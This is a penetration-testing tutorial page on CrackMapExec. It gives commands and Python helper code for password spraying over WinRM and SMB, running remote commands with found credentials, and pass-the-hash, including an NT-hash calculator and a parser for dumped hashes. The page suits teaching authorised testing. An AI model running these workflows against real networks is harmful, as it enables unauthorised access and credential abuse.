====== CrackMapExec (CME) ======
**CrackMapExec:** "A swiss army knife for pentesting networks..."
* CrackMapExec (a.k.a. CME) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.
* Built with stealth in mind, CME follows the concept of "Living off the Land": abusing built-in Active Directory features/protocols to achieve its functionality, which lets it evade most endpoint protection/IDS/IPS solutions.
  * Caveat: "living off the land" is not invisible. Every login attempt, successful or not, lands in the target's Security log, and the SMB command-execution methods spawn a process through WMI, a service or a scheduled task, all of which endpoint telemetry can record.
* See the [[https://ptestmethod.readthedocs.io/en/latest/cme.html | documentation]] for other help and examples.
**Supported Protocols:** WinRM, MSSQL, SMB, SSH
For help and syntax, just issue the command: ''crackmapexec'' or...
crackmapexec -h
crackmapexec winrm -h # (for help specific to the winrm protocol)
crackmapexec smb -h # (for help specific to the smb protocol)
**General Syntax:**
crackmapexec [protocol] [target] -u username -p password
* ''[protocol]'' is one of the modules listed above (''smb'', ''winrm'', ''mssql'', ''ssh''). ''[target]'' can be an IP, a hostname, a CIDR range such as ''10.10.10.0/24'', an IP range, or a file with one target per line.
**Examples:**
crackmapexec smb [target ip] -u username -p 'Admin!123@' # or...
crackmapexec smb [target ip] -u='username' -p='Admin!123@'
* Both forms are equivalent: the shell strips the quotes before CME sees the arguments. The single quotes matter for a password like this one, because in an interactive bash session an unquoted or double-quoted ''!'' triggers history expansion, and ''$'' or backticks would be expanded too.
===== CME & WinRM =====
**Syntax:**
crackmapexec winrm [target ip] -u administrator -p /usr/share/.../unix_passwords.txt
Both ''-u'' and ''-p'' accept either a single value or a file with one entry per line, so the command above tries every password in the list against the single user ''administrator''.
* By default CME stops at the first valid login per host; add ''--continue-on-success'' when you want every working combination from a user list.
* Trying the built-in administrator account first is a shortcut: a hit there means no privilege escalation is needed on that host.
* Before pointing a wordlist at domain user accounts, check the domain lockout threshold; a spray like this can lock them out.
* A green "**[+]**" marks a valid login; a red "**[-]**" marks a failure.
Look over the output (from the top down):
* The first line shows the connection to WinRM (TCP 5985 for HTTP, 5986 for HTTPS).
* NOTE: WinRM is Microsoft's implementation of WS-Management (WS-Man), a SOAP-over-HTTP remote management protocol; ''wsman'' refers to that protocol and its endpoint, not to a separate tool.
**Execute Commands:** If you found working credentials, you can use crackmapexec to execute arbitrary Windows commands on the target. Over WinRM the command runs as that user; ''-x'' takes a cmd.exe command and ''-X'' a PowerShell command. Syntax:
crackmapexec winrm [target ip] -u administrator -p [password] -x "whoami"
crackmapexec winrm [target ip] -u administrator -p [password] -x "systeminfo"
You should get some happy feedback along with the results of your command execution.
* ''systeminfo'' (Windows) takes a while to run but provides a lot of information about your target system.
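The spray-then-execute workflow above, as an added example (not code from the original page or from the CrackMapExec project): a small Python wrapper that builds CME's argv as a list (so a password such as ''Admin!123@'' needs no shell quoting), runs CME when it is on PATH, and parses the per-host result lines into records you can triage. ''SAMPLE_OUTPUT'' is constructed for this example in CME's column layout; the hosts, domain and credentials in it are invented, and the helper names are mine.

```python
import re
import subprocess
from typing import Dict, List, Optional

# Added example; not part of the original page or of CrackMapExec itself.
# Constructed sample in CME's column layout (PROTOCOL IP PORT HOSTNAME [status] message);
# hosts, domain and credentials are invented for the example.
SAMPLE_OUTPUT = """\
WINRM       10.10.10.7      5985   WS02             [*] Windows 10.0 Build 19041 (name:WS02) (domain:corp.local)
WINRM       10.10.10.7      5985   WS02             [+] corp.local\\administrator:Admin!123@ (Pwn3d!)
WINRM       10.10.10.8      5985   WS03             [-] corp.local\\administrator:Admin!123@
SMB         10.10.10.5      445    DC01             [*] Windows Server 2019 Build 17763 x64 (name:DC01) (domain:corp.local) (signing:True) (SMBv1:False)
SMB         10.10.10.5      445    DC01             [+] corp.local\\administrator:Admin!123@ (Pwn3d!)
SMB         10.10.10.6      445    WS01             [+] corp.local\\svc_backup:Admin!123@
SMB         10.10.10.9      445    WS04             [-] corp.local\\administrator:Admin!123@ STATUS_LOGON_FAILURE
"""

ANSI_RE = re.compile(r"\x1b\[[0-9;]*m")  # CME colours [+]/[-] when writing to a terminal
LINE_RE = re.compile(
    r"^(?P<proto>[A-Z]+)\s+(?P<host>\S+)\s+(?P<port>\d+)\s+(?P<name>\S+)\s+"
    r"\[(?P<status>[+\-*!])\]\s+(?P<msg>.*)$"
)


def parse_cme_output(text: str) -> List[Dict]:
    """Keep only login results ([+] valid / [-] failed) and structure them.

    'admin' is True when CME appended (Pwn3d!), i.e. the account is a local
    administrator on that host, which is what command execution requires.
    """
    results = []
    for raw in text.splitlines():
        m = LINE_RE.match(ANSI_RE.sub("", raw).rstrip())
        if not m or m.group("status") not in "+-":
            continue
        msg = m.group("msg")
        results.append({
            "proto": m.group("proto"),
            "host": m.group("host"),
            "port": int(m.group("port")),
            "cred": msg.replace("(Pwn3d!)", "").split()[0],  # 'DOMAIN\user:secret'
            "valid": m.group("status") == "+",
            "admin": "(Pwn3d!)" in msg,
        })
    return results


def admin_hosts(results: List[Dict]) -> List[str]:
    """Hosts where the credential is valid AND gives admin (green [+] with Pwn3d!)."""
    return sorted({r["host"] for r in results if r["valid"] and r["admin"]})


def cme_command(proto: str, target: str, user: str, password: Optional[str] = None,
                nthash: Optional[str] = None, command: Optional[str] = None,
                domain: Optional[str] = None, continue_on_success: bool = False) -> List[str]:
    """Build crackmapexec's argv as a list. No shell is involved, so a password like
    Admin!123@ needs no quoting and bash history expansion cannot eat the '!'."""
    if (password is None) == (nthash is None):
        raise ValueError("give exactly one of password or nthash")
    argv = ["crackmapexec", proto, target, "-u", user]
    argv += ["-p", password] if password is not None else ["-H", nthash]
    if domain:
        argv += ["-d", domain]
    if continue_on_success:  # otherwise CME stops at the first valid login per host
        argv.append("--continue-on-success")
    if command:
        argv += ["-x", command]
    return argv


def run_cme(argv: List[str]) -> List[Dict]:
    """Run crackmapexec (must be on PATH) and return the parsed login results."""
    proc = subprocess.run(argv, capture_output=True, text=True, check=False)
    return parse_cme_output(proc.stdout)


if __name__ == "__main__":
    hits = parse_cme_output(SAMPLE_OUTPUT)
    for r in hits:
        print(r)
    for host in admin_hosts(hits):
        print("would run:", " ".join(cme_command("smb", host, "administrator",
                                                  password="Admin!123@", command="whoami")))
```

Replace ''parse_cme_output(SAMPLE_OUTPUT)'' with ''run_cme(cme_command(...))'' to drive a real run; the parser strips the colour codes CME emits on a terminal, so it also works on saved output.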
===== CME & Pass-the-Hash =====
crackmapexec smb [target ip] -u Administrator -H "[administrator ntlm hash; copy-paste]"
* ''-H'' takes the NT hash (32 hex characters) on its own, or ''LM:NT'' exactly as secretsdump/mimikatz/hashdump print it; only the NT half matters for the login. No plaintext is needed, which is the whole point of pass-the-hash.
* If the hash came from the local SAM rather than the domain, add ''--local-auth'' so CME authenticates against the local account instead of the domain.
The result line tells you whether it worked:
* A green **[+]** means the hash authenticated; **(Pwn3d!)** after it means the account is a local administrator on that host, which is what command execution over SMB requires. A **[+]** without **(Pwn3d!)** is a valid but non-admin credential, and ''-x'' will fail.
crackmapexec smb [target ip] -u Administrator -H "[administrator ntlm hash; copy-paste]" -x "ipconfig"
CME prints the command output under the login line. Over SMB the command runs through the default execution method, wmiexec (''--exec-method'' switches to ''smbexec'' or ''atexec''), so expect a WMI-spawned process, a short-lived service, or a scheduled task on the target respectively. Execute what you want from there.
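What the ''-H'' value actually is, as an added example (not code from the page or from CME): an NT hash is MD4 over the UTF-16LE encoding of the password, so the block computes one in pure Python (hashlib's md4 is often unavailable under OpenSSL 3), pulls the NT field out of a secretsdump/hashdump style ''user:rid:LM:NT:::'' line, and rejects the copy-paste slips that make a pass-the-hash attempt fail for no obvious reason: pasting the LM field, a truncated hash, or the whole line. The dump line is constructed and the helper names are mine; the expected digests are the RFC 1320 test vectors and the well-known NT hash of ''password''.

```python
import re
import struct

# Added example; not part of the original page or of CrackMapExec itself.


def md4(data: bytes) -> bytes:
    """MD4 (RFC 1320) in pure Python; hashlib.new('md4') is often missing under OpenSSL 3."""
    mask = 0xFFFFFFFF

    def rotl(x, n):
        return ((x << n) | (x >> (32 - n))) & mask

    def f(x, y, z):
        return (x & y) | (~x & z)

    def g(x, y, z):
        return (x & y) | (x & z) | (y & z)

    def h(x, y, z):
        return x ^ y ^ z

    # Pad: 0x80, zeros up to 56 mod 64, then the message bit length as a little-endian u64.
    bit_len = len(data) * 8
    data = data + b"\x80" + b"\x00" * ((55 - len(data)) % 64) + struct.pack("<Q", bit_len)
    a, b, c, d = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    order2 = (0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15)
    order3 = (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15)
    for off in range(0, len(data), 64):
        x = struct.unpack("<16I", data[off:off + 64])
        aa, bb, cc, dd = a, b, c, d
        for i in range(16):  # round 1: F, message words in order
            a = rotl((a + f(b, c, d) + x[i]) & mask, (3, 7, 11, 19)[i % 4])
            a, b, c, d = d, a, b, c
        for i in range(16):  # round 2: G, column order, constant sqrt(2)
            a = rotl((a + g(b, c, d) + x[order2[i]] + 0x5A827999) & mask, (3, 5, 9, 13)[i % 4])
            a, b, c, d = d, a, b, c
        for i in range(16):  # round 3: H, bit-reversed order, constant sqrt(3)
            a = rotl((a + h(b, c, d) + x[order3[i]] + 0x6ED9EBA1) & mask, (3, 9, 11, 15)[i % 4])
            a, b, c, d = d, a, b, c
        a, b, c, d = (a + aa) & mask, (b + bb) & mask, (c + cc) & mask, (d + dd) & mask
    return struct.pack("<4I", a, b, c, d)


def nt_hash(password: str) -> str:
    """NT hash = MD4(UTF-16LE(password)), unsalted: the value -H is fed for pass-the-hash."""
    return md4(password.encode("utf-16-le")).hex()


EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"  # LM hash of an empty (or disabled) LM password
HASH_ARG_RE = re.compile(r"^(?:[0-9a-f]{32}:)?[0-9a-f]{32}$")


def check_hash_arg(value: str) -> str:
    """Validate what goes after -H: 32 hex chars (NT) or LM:NT. Catches the usual
    copy-paste slips: half a hash, the whole dump line, or the LM field by itself."""
    value = value.strip().lower()
    if not HASH_ARG_RE.match(value):
        raise ValueError("-H wants 32 hex characters (NT) or LM:NT, got %r" % value)
    if value.split(":")[-1] == EMPTY_LM:
        raise ValueError("that is the empty LM hash, not an NT hash; copy the fourth field")
    return value


def is_valid_hash_arg(value: str) -> bool:
    """Boolean form of check_hash_arg, for callers that just want yes/no."""
    try:
        check_hash_arg(value)
        return True
    except ValueError:
        return False


def hash_arg_from_dump(line: str) -> str:
    """Pull the NT field out of a secretsdump/hashdump style 'user:rid:LM:NT:::' line.
    Only the NT hash is needed; the LM field is almost always EMPTY_LM anyway."""
    fields = line.strip().split(":")
    if len(fields) < 4:
        raise ValueError("expected user:rid:LM:NT::: but got %r" % line)
    return check_hash_arg(fields[3])


if __name__ == "__main__":
    # Constructed dump line for the example: RID 500 with the NT hash of 'password'.
    dump = "Administrator:500:%s:%s:::" % (EMPTY_LM, nt_hash("password"))
    print("NT('password') =", nt_hash("password"))
    print("crackmapexec smb [target ip] -u Administrator -H", hash_arg_from_dump(dump))
```

Computing ''nt_hash()'' of a password you already know and comparing it with the dump is also a quick way to confirm the dump is from the account you think it is before you spend time on pass-the-hash.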
----